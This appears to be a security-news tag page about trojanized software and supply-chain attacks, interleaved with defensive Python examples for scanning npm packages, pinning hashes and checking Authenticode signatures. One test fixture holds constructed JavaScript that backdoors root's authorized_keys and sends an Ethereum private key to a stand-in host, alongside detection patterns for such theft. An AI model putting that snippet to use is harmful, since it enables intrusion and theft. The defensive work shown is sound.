trojanized
-
Attacks commenced with the distribution of phishing emails purporting to be from Binance.
-
The financially motivated threat actor known as EncryptHub has been observed orchestrating sophisticated phishing campaigns to deploy information stealers and ransomware, while also working on a new product called EncryptRAT. “EncryptHub has been observed targeting users of popular applications, by distributing trojanized versions,” Outpost24 KrakenLabs said in a new report shared with The
-
There are probably no gamers left who don’t know that downloading games from torrent trackers is risky business. Yes, they come at no cost, cracked and sometimes conveniently repacked, but they might contain malware. That’s why security solutions throw a fit — quarantining torrent files, preventing the installation of cracks… well, we should be thankful for that!…
-
EclecticIQ analysts have identified a high-confidence cyber espionage campaign conducted by Sandworm (APT44), a threat actor supporting Russia’s Main Intelligence Directorate (GRU), against Ukrainian Windows users. The campaign, likely ongoing since late 2023, involves the use of pirated Microsoft Key Management Service (KMS) activators and fake Windows updates to deliver a new version of BACKORDER,…
-
Executive Summary EclecticIQ analysts assess with high confidence…
-
Both campaigns involved the distribution of malicious emails purporting to be invoices, purchase orders, or quotation requests. Each carries an attachment which, when opened, triggers a PowerShell script that fetches the trojanized image and executes a .NET-based loader to launch the payloads.
-
Attackers have compromised Ultralytics YOLO packages published on PyPI, the official Python package index, by compromising the build environment of the popular library for creating custom machine learning models. The malicious code deployed cryptocurrency mining malware on systems that installed the package, but the attackers could have delivered any type of malware.
-
In a new report, Dr.Web’s research team has uncovered a dangerous wave of malicious apps on Google Play, revealing that over 2 million users have unwittingly downloaded trojanized applications, primarily from the Android.FakeApp family. One of the standout examples, Android.FakeApp.1669, “differs from most of the threats that are similar to it in that it uses…
-
Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU) connected hackers that is targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or “Fancy Bear.” Using a novel approach, attackers lure recipients into executing malicious PowerShell commands directly from…
-
Phylum’s automated risk detection platform recently flagged several suspicious packages published to npm. Upon investigation, we found these packages attempting to exfiltrate Ethereum private keys and gain SSH access to the victim’s machine by writing the attacker’s SSH public key in the root user’s authorized_keys file. Stop me if you’ve heard this one before…
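The behaviour in the item above (install-time hooks that append an attacker key to root's authorized_keys and ship a wallet secret off-host) is easy to triage mechanically before a package is ever installed. The following is an added example, not Phylum's detection platform: it reads the lifecycle scripts from package.json, scans the other files for a small, assumed indicator set, and flags the package only when an install hook and a high-severity indicator coincide. The two packages are constructed samples with made-up names.

```python
"""Scan an unpacked npm package for install-time hooks and SSH/wallet indicators.

Added example; not Phylum's detection platform. The "package" is a dict of
file name -> file text standing in for an extracted tarball.
"""
import json
import re
from typing import Dict, List

# npm runs these scripts automatically during `npm install`, which is why
# supply-chain payloads are usually wired in here.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Illustrative indicators for the behaviour described above (assumed, not a
# complete rule set): SSH backdooring and wallet-secret exfiltration.
INDICATORS = {
    "ssh_authorized_keys": re.compile(r"authorized_keys|/root/\.ssh|~/\.ssh"),
    "ssh_public_key_literal": re.compile(r"ssh-(?:rsa|ed25519) AAAA[0-9A-Za-z+/]+"),
    "wallet_secret": re.compile(r"private[_ ]?key|mnemonic|seed[_ ]?phrase", re.I),
    "network_send": re.compile(r"https?://|\.request\(|fetch\(|net\.connect\("),
}
HIGH_SEVERITY = {"ssh_authorized_keys", "ssh_public_key_literal"}


def lifecycle_scripts(package_json: str) -> Dict[str, str]:
    """Return only the scripts npm will run on install, from package.json text."""
    scripts = json.loads(package_json).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in LIFECYCLE_HOOKS}


def scan_source(text: str) -> List[str]:
    """Names of the indicators present in one file."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_package(files: Dict[str, str]) -> Dict[str, object]:
    """Combine hooks and per-file hits into a verdict.

    A package is flagged when it has an install hook AND either an SSH
    backdoor indicator or both a wallet-secret and a network-send indicator.
    """
    hooks = lifecycle_scripts(files.get("package.json", "{}"))
    findings: Dict[str, List[str]] = {}
    for path, text in files.items():
        if path == "package.json":
            continue
        hits = scan_source(text)
        if hits:
            findings[path] = hits
    all_hits = {hit for hits in findings.values() for hit in hits}
    suspicious = bool(hooks) and (
        bool(all_hits & HIGH_SEVERITY) or {"wallet_secret", "network_send"} <= all_hits
    )
    return {"hooks": hooks, "findings": findings, "suspicious": suspicious}


# Constructed samples (made-up package names, not real packages).
MALICIOUS_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-wallet-helper", "version": "1.0.3",
        "scripts": {"postinstall": "node setup.js", "test": "echo ok"},
    }),
    "setup.js": r"""
const fs = require('fs');
// constructed: attacker key appended to root's authorized_keys
const key = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfakekeymaterial attacker@example';
fs.appendFileSync('/root/.ssh/authorized_keys', key + '\n');
const secret = process.env.ETH_PRIVATE_KEY;
require('https').request({host: 'collector.example', method: 'POST'}).end(secret);
""",
    "index.js": "module.exports = { add: (a, b) => a + b };",
}
BENIGN_PACKAGE = {
    "package.json": json.dumps({"name": "example-pad", "version": "2.0.0",
                                "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (s, n) => s.padStart(n);",
}

if __name__ == "__main__":
    for label, pkg in (("malicious", MALICIOUS_PACKAGE), ("benign", BENIGN_PACKAGE)):
        print(label, scan_package(pkg))
```

The hook check matters as much as the pattern match: a string like `authorized_keys` in a library that legitimately manages SSH config is noise, but the same string reachable from a `postinstall` script runs with the installing user's privileges on every `npm install`. Treat a hit as a reason to read the script, not as a verdict, and remember that real payloads are usually obfuscated or fetched at install time, so this catches only the careless first stage.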
-
Mandiant has unveiled a new wave of cyber-espionage attacks orchestrated by the North Korea-linked group UNC2970. This group has recently employed a sophisticated method to deliver a custom backdoor named MISTPEN, by trojanizing a legitimate PDF reader, SumatraPDF. The report highlights that UNC2970 is primarily targeting senior-level employees in critical industries such as energy and…
-
Cybersecurity researchers have observed a sharp increase in infections associated with a malware distribution campaign that employs a loader known as NUMOZYLOD.
-
Since May 26, 2024, Phylum has been monitoring a persistent supply chain attack involving a trojanized version of jQuery. We initially discovered the malicious variant on npm, where we saw the compromised version published in dozens of packages over a month. After investigating, we found instances of the trojanized jQuery on other platforms, such as…
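The trojanized jQuery above and the Ultralytics PyPI compromise further up share one consumer-side defence: pin the artifact you vetted by hash, and refuse anything whose bytes differ. The following is an added example, not code from Phylum, the jQuery project or Ultralytics. It implements the two pins a practitioner actually deploys, an SRI integrity token for a script tag (with the browser's strongest-algorithm matching rule) and a pip-style `sha256:<hex>` pin as used with `pip install --require-hashes`. The file bytes, package name and version are constructed; the "known-good" hash is taken once at vetting time and then held fixed.

```python
"""Verify third-party artifacts against hashes pinned at vetting time.

Added example, not code from Phylum, jQuery or Ultralytics. Covers:
  * an SRI integrity string for a script tag (what the browser checks),
  * a pip-style "sha256:<hex>" pin (what `pip install --require-hashes` checks).
"""
import base64
import hashlib
import hmac

# SRI algorithms in increasing strength; the browser keeps the strongest set.
SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(data: bytes, algorithm: str = "sha384") -> str:
    """Produce an SRI token such as 'sha384-<base64 digest>'."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"SRI does not allow {algorithm!r}")
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(data: bytes, integrity: str) -> bool:
    """Apply the SRI matching rule: keep only the tokens of the strongest
    algorithm present, and accept if any of them matches the data."""
    by_alg = {}
    for token in integrity.split():
        alg, sep, rest = token.partition("-")
        if sep and alg in SRI_ALGORITHMS:
            by_alg.setdefault(alg, []).append(rest.split("?", 1)[0])  # drop ?options
    if not by_alg:
        return False  # unknown or unsupported algorithms never match
    strongest = max(by_alg, key=SRI_ALGORITHMS.index)
    actual = sri_hash(data, strongest).split("-", 1)[1]
    return any(expected.isascii() and hmac.compare_digest(actual, expected)
               for expected in by_alg[strongest])


def pip_pin_matches(data: bytes, pin: str) -> bool:
    """Check a requirements.txt style pin 'sha256:<hex>' against artifact bytes."""
    alg, sep, hexdigest = pin.partition(":")
    if not sep or alg not in ("sha256", "sha384", "sha512"):
        return False
    actual = hashlib.new(alg, data).hexdigest()
    return hexdigest.isascii() and hmac.compare_digest(actual, hexdigest.lower())


def requirement_line(name: str, version: str, data: bytes) -> str:
    """Render the pinned requirements.txt line you commit after vetting an artifact."""
    return f"{name}=={version} --hash=sha256:{hashlib.sha256(data).hexdigest()}"


# Constructed samples. GOOD_JS stands in for the copy that was vetted; the
# trojanized copy is the same file with code appended, as in the campaign above.
GOOD_JS = b"/* constructed jquery-like stub */\nwindow.$ = s => document.querySelector(s);\n"
TROJANIZED_JS = GOOD_JS + b"(function(){ /* attacker-appended, constructed */ })();\n"
PINNED_INTEGRITY = sri_hash(GOOD_JS)  # taken once, at vetting time, then fixed
GOOD_WHEEL = b"PK\x03\x04constructed-wheel-bytes"  # placeholder, not a real wheel
PINNED_REQUIREMENT = requirement_line("example-pkg", "1.0.0", GOOD_WHEEL)

if __name__ == "__main__":
    print(PINNED_INTEGRITY)
    print("vetted copy     :", sri_matches(GOOD_JS, PINNED_INTEGRITY))
    print("trojanized copy :", sri_matches(TROJANIZED_JS, PINNED_INTEGRITY))
    print(PINNED_REQUIREMENT)
```

Two caveats belong with this. A pin only protects you against artifacts that differ from the one you vetted; if the first version you ever pin is the malicious one, the pin faithfully preserves the compromise, which is why the Ultralytics case (malicious code introduced through the build pipeline) still needs review of what was vetted, not just that it has not changed. And SRI covers scripts the browser fetches cross-origin; a trojanized jQuery bundled into your own build is caught only by the package-level pin.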
-
Jul 09, 2024, Newsroom, Supply Chain Attack / Web Security
-
Attackers have leveraged trojanized versions of Indian software provider Conceptworld’s installers for its Copywhiz, Notezilla, and RecentX programs to facilitate the delivery of information-stealing malware, The Hacker News reports.
-
Malicious Android apps have been leveraged by Pakistan-linked hacking operation Transparent Tribe to facilitate the deployment of the CapraRAT spyware as part of a new surveillance campaign against gamers and weapons enthusiasts, reports The Hacker News.
-
Rapid7, a prominent cybersecurity firm, has uncovered a sophisticated supply chain attack targeting users of well-known Windows software tools Notezilla, RecentX, and Copywhiz. The attack involves the distribution of trojanized installers that, alongside legitimate software, install information-stealing malware capable of downloading additional malicious payloads.
-
Last updated at Thu, 27 Jun 2024 18:01:02 GMT. The following Rapid7 analysts contributed to this research: Leo Gutierrez, Tyler McGraw, Sarah Lee, and Thomas Elkins.
-
Attacks using malicious installers for Microsoft Teams, Google Chrome, and other widely used software have been launched to facilitate the delivery of the Oyster backdoor, also known as Broomstick, as part of a new malvertising campaign, The Hacker News reports.
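For the trojanized-installer items above (the Conceptworld installers and the malvertised Microsoft Teams and Chrome installers delivering Oyster), a first triage question is whether the file carries an Authenticode signature at all, since vendor releases normally do and a repackaged installer often does not. The following is an added example, not Rapid7's or any vendor's code: it parses the PE headers in pure Python, locates the certificate table (data directory entry 4, whose "RVA" is actually a file offset) and reads the WIN_CERTIFICATE header in front of the PKCS#7 blob. The sample image is a constructed header-only PE32+ fixture with a placeholder blob, not a real signed binary.

```python
"""Locate the Authenticode certificate table in a PE file.

Added example (not Rapid7's tooling). Presence of a table is a triage signal
only; validating the PKCS#7 signature and chain is a separate step.
"""
import struct
from typing import Dict

IMAGE_DIRECTORY_ENTRY_SECURITY = 4      # certificate table index
WIN_CERT_REVISION_2_0 = 0x0200
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def authenticode_info(pe: bytes) -> Dict[str, object]:
    """Return where (and whether) the certificate table is, from PE bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    (size_of_optional,) = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20                                   # optional header start
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic == 0x10B:                                # PE32
        rva_count_off, dirs_off = 92, 96
    elif magic == 0x20B:                              # PE32+
        rva_count_off, dirs_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    info: Dict[str, object] = {"pe32plus": magic == 0x20B, "has_signature": False}
    (n_dirs,) = struct.unpack_from("<I", pe, opt + rva_count_off)
    entry = opt + dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY or entry + 8 > opt + size_of_optional:
        return info                                   # no certificate directory
    cert_off, cert_size = struct.unpack_from("<II", pe, entry)
    if cert_off == 0 or cert_size == 0:
        return info                                   # directory present but empty
    if cert_off + cert_size > len(pe):
        raise ValueError("certificate table points outside the file")
    length, revision, cert_type = struct.unpack_from("<IHH", pe, cert_off)
    info.update(
        has_signature=True, offset=cert_off, size=cert_size, length=length,
        revision=revision, cert_type=cert_type,
        is_pkcs7=cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA,
    )
    return info


def build_sample_pe(signed: bool) -> bytes:
    """Constructed minimal PE32+ image (headers only, no sections) as a fixture."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    optional = bytearray(240)                         # PE32+ optional header size
    struct.pack_into("<H", optional, 0, 0x20B)        # Magic
    struct.pack_into("<I", optional, 108, 16)         # NumberOfRvaAndSizes
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, len(optional), 0x22)
    headers_len = e_lfanew + 4 + 20 + len(optional)   # 392, 8-byte aligned
    cert = b""
    if signed:
        blob = b"\x30\x82\x00\x00constructed-placeholder-not-real-pkcs7"
        cert = struct.pack("<IHH", 8 + len(blob), WIN_CERT_REVISION_2_0,
                           WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
        struct.pack_into("<II", optional, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                         headers_len, len(cert))
    return dos + b"PE\0\0" + coff + bytes(optional) + cert


if __name__ == "__main__":
    for label, flag in (("signed", True), ("unsigned", False)):
        print(label, authenticode_info(build_sample_pe(flag)))
```

On a real installer read the file with `open(path, "rb").read()` and pass it in. A missing table on a vendor whose releases are normally signed is a strong reason to stop; a present table proves nothing by itself, because the certificate table is excluded from the Authenticode hash (anything can be appended there) and a trojanized build can simply be signed with a different certificate. Validate the signature and chain, and compare the signer against the vendor's known identity, with `signtool verify /pa` or `Get-AuthenticodeSignature` before trusting the file.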